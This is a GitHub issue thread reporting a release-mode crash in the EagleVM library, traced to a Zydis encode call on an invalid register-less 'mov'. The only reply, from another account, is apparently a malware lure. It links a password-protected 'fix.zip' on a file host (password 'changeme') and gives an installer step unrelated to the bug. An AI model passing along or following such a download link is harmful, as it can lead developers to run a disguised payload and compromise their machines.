### ISSUE TITLE
Release mode "EagleVM" core library runner crash

### ISSUE THREAD

**Issue by notpidgey** [notpidgey/EagleVM#20]
There seems to be a crash which occurs inside of EagleVM when running in release mode. With debug information, it occurs during a Zydis encode function call which returns an invalid status code because of an attempt to encode `mov, REG(NONE), REG(NONE)`.

As far as I have tested, this is not caused by the random seeder so there seems to be some some kind of undefined behavior going on.

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
